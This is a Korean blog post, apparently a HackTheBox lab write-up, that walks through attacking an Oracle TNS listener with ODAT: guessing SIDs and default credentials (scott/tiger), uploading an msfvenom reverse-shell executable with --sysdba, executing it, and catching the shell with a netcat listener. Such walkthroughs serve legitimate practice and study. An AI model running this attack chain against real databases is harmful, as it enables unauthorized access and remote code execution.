nmap
microsoft iis 8.5 버전은 취약하지 않다.
RPC가 엄청 많이 보인다.
TNS.. telnet으로 접속해봤는데 뭐만 입력하면 꺼져버린다.
139, 445포트는 smb.. smbmap, smbclient not working....
enumeration
80 : IIS server. gobuster를 돌려도 유의미한 결과를 얻을 수 없다.
smb 관련해서는 smbclient로 접속 불가...
tns listener... 이걸 한 번 이용해 익스해봐야겠다.
tns listener 검색해보면 oracle,,,, oracle로 enumerate할 수 있는 도구를 찾는게 우선
ODAT
sudo apt install odat
odat sidguesser -s 10.10.10.82 -p 1521
locate oracle_default_userpass.txt
cp /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt /usr/share/odat/accounts/oracle_default_userpass.txt
(vi editor) :%s/ /\//g
odat passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file accounts/oracle_default_userpass.txt
Oracle document에 따르면, 우리가 찾은 username/password는 Oracle 세팅할 때 사용된 default credentials이라고 한다. 이제 우리는 valid sid와 username/password가 있으므로 익스를 시도할 수 있다.
exploit
odat -h에서 utlfile을 찾을 수 있다.
1. msfvenom을 이용해 리버스쉘(exe) 생성 -> shell.exe
2. odat utlfile -s 10.10.10.82 -p 1521 -U "scott" -p "tiger" -d XE --putFile /temp shell.exe <shell.exe 전체 경로>
2-1. 2의 결과로 'insufficient privilege'가 나올 것이다.
3. odat utlfile -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp shell.exe <shell.exe 전체 경로> --sysdba
4. sudo odat externaltable -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --exec /temp shell.exe --sysdba
이때 nc -nlvp 1234하고 있으면 쉘이 따지고 user.txt, root.txt 모두 확인할 수 있다.
'워게임 > hackthebox' 카테고리의 다른 글
| jarvis 롸업 정리 (0) | 2021.10.10 |
|---|---|
| jerry 롸업 정리(톰캣 배포 이해) (0) | 2021.10.09 |
| grandpa 롸업 정리- 다시해보기 (0) | 2021.10.05 |
| arctic 롸업 정리 (0) | 2021.10.05 |
| granny 롸업 정리 (0) | 2021.10.03 |
댓글